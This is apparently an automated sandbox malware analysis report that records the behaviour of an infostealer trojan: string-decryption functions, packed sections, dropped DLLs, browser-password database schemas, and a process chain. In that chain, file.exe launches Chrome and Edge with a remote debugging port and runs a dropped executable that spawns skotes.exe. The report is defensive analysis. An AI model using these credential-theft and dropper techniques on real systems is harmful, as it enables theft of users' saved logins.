Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB43D00	0_2_6CB43D00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB03EC0	0_2_6CB03EC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC65E60	0_2_6CC65E60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBEDE10	0_2_6CBEDE10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC3BE70	0_2_6CC3BE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC63FC0	0_2_6CC63FC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB01F90	0_2_6CB01F90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB8BFF0	0_2_6CB8BFF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBFDFC0	0_2_6CBFDFC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB15F20	0_2_6CB15F20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAD5F30	0_2_6CAD5F30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC37F20	0_2_6CC37F20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC3B8F0	0_2_6CC3B8F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBBF8F0	0_2_6CBBF8F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAED8E0	0_2_6CAED8E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB138E0	0_2_6CB138E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB7F8C0	0_2_6CB7F8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB3D810	0_2_6CB3D810
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBB1990	0_2_6CBB1990
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAF1980	0_2_6CAF1980
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB459F0	0_2_6CB459F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB779F0	0_2_6CB779F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB199D0	0_2_6CB199D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB799C0	0_2_6CB799C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB95920	0_2_6CB95920
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC2F900	0_2_6CC2F900
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB5F960	0_2_6CB5F960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB9D960	0_2_6CB9D960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBBDAB0	0_2_6CBBDAB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAE1AE0	0_2_6CAE1AE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBDDA30	0_2_6CBDDA30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC69A50	0_2_6CC69A50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB1FA10	0_2_6CB1FA10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB81A10	0_2_6CB81A10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBA9BB0	0_2_6CBA9BB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB39BA0	0_2_6CB39BA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBC5B90	0_2_6CBC5B90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAD1B80	0_2_6CAD1B80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB27BF0	0_2_6CB27BF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB2BB20	0_2_6CB2BB20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBBFB60	0_2_6CBBFB60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAE14E0	0_2_6CAE14E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC614A0	0_2_6CC614A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBC9430	0_2_6CBC9430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB6D410	0_2_6CB6D410
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB19590	0_2_6CB19590
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB655F0	0_2_6CB655F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB47500	0_2_6CB47500
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAF5510	0_2_6CAF5510
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC2F510	0_2_6CC2F510
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB116A0	0_2_6CB116A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB496A0	0_2_6CB496A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB57610	0_2_6CB57610
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB09600	0_2_6CB09600
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB35640	0_2_6CB35640
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAF9650	0_2_6CAF9650
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC237C0	0_2_6CC237C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB6B7A0	0_2_6CB6B7A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB03720	0_2_6CB03720
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBB9720	0_2_6CBB9720
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB4D710	0_2_6CB4D710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB97090	0_2_6CB97090
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB2B020	0_2_6CB2B020
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Code function: 16_2_00197049	16_2_00197049
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Code function: 16_2_00198860	16_2_00198860
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Code function: 16_2_001978BB	16_2_001978BB
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Code function: 16_2_001931A8	16_2_001931A8
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Code function: 16_2_00154B30	16_2_00154B30
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Code function: 16_2_00192D10	16_2_00192D10
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Code function: 16_2_00154DE0	16_2_00154DE0
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Code function: 16_2_00187F36	16_2_00187F36
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Code function: 16_2_0019779B	16_2_0019779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 17_2_005F7049	17_2_005F7049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 17_2_005F8860	17_2_005F8860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 17_2_005F78BB	17_2_005F78BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 17_2_005F31A8	17_2_005F31A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 17_2_005B4B30	17_2_005B4B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 17_2_005F2D10	17_2_005F2D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 17_2_005B4DE0	17_2_005B4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 17_2_005E7F36	17_2_005E7F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 17_2_005F779B	17_2_005F779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 18_2_005F7049	18_2_005F7049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 18_2_005F8860	18_2_005F8860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 18_2_005F78BB	18_2_005F78BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 18_2_005F31A8	18_2_005F31A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 18_2_005B4B30	18_2_005B4B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 18_2_005F2D10	18_2_005F2D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 18_2_005B4DE0	18_2_005B4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 18_2_005E7F36	18_2_005E7F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 18_2_005F779B	18_2_005F779B

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 005CDF80 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 005C80C0 appears 260 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CB03620 appears 98 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CC609D0 appears 353 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CC19F30 appears 52 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CC6D930 appears 71 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CB09B10 appears 109 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CC6DAE0 appears 89 times
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Code function: String function: 001680C0 appears 130 times

PE file overlay found

Source: 931e3b56d4.exe.20.dr	Static PE information: Data appended to the last section found
Source: random[1].exe.0.dr	Static PE information: Data appended to the last section found

Sample file is different than original file name gathered from version info

Source: file.exe, 00000000.00000002.2009022640.000000006FE52000.00000002.00000001.01000000.0000000A.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2008277067.000000006CCB5000.00000002.00000001.01000000.00000009.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: random[1].exe.0.dr	Static PE information: Section: ZLIB complexity 0.997838356316726
Source: random[1].exe.0.dr	Static PE information: Section: zhhhapid ZLIB complexity 0.9954010928856791
Source: 931e3b56d4.exe.20.dr	Static PE information: Section: ZLIB complexity 0.997838356316726
Source: 931e3b56d4.exe.20.dr	Static PE information: Section: zhhhapid ZLIB complexity 0.9954010928856791

Source: file.exe

Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@38/60@6/8

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CB40300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,

0_2_6CB40300

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\STFTSJRY.htm

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7964:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d

Source: C:\Users\user\Documents\JDGIECGIEB.exe

File created: C:\Users\user\AppData\Local\Temp\abc3bc1985

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.2006319453.000000006CC6F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.1996036540.000000001D259000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2005279196.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.2006319453.000000006CC6F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.1996036540.000000001D259000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2005279196.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2006319453.000000006CC6F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.1996036540.000000001D259000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2005279196.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2006319453.000000006CC6F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.1996036540.000000001D259000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2005279196.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, file.exe, 00000000.00000002.2006319453.000000006CC6F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.1996036540.000000001D259000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2005279196.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2006319453.000000006CC6F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.1996036540.000000001D259000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2005279196.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: file.exe, 00000000.00000002.1996036540.000000001D259000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2005279196.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000003.1607838864.000000001D159000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1742832864.000000001D14D000.00000004.00000020.00020000.00000000.sdmp, IIDAAFBGDBKJJJKFIIIJ.0.dr, EGIDBFBFHJDGCAKEGHJE.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.1996036540.000000001D259000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2005279196.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.1996036540.000000001D259000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2005279196.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 --field-trial-handle=1960,i,3989721194292092949,15909847573822481878,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2308 --field-trial-handle=2176,i,5053567703941882623,5826024289119121658,262144 /prefetch:3
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2348 --field-trial-handle=2060,i,13102130141342141745,5107454723265991497,262144 /prefetch:3
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\JDGIECGIEB.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\Documents\JDGIECGIEB.exe "C:\Users\user\Documents\JDGIECGIEB.exe"
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\JDGIECGIEB.exe"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 --field-trial-handle=1960,i,3989721194292092949,15909847573822481878,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2308 --field-trial-handle=2176,i,5053567703941882623,5826024289119121658,262144 /prefetch:3	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2348 --field-trial-handle=2060,i,13102130141342141745,5107454723265991497,262144 /prefetch:3	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\Documents\JDGIECGIEB.exe "C:\Users\user\Documents\JDGIECGIEB.exe"	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: apphelp.dll	Jump to behavior
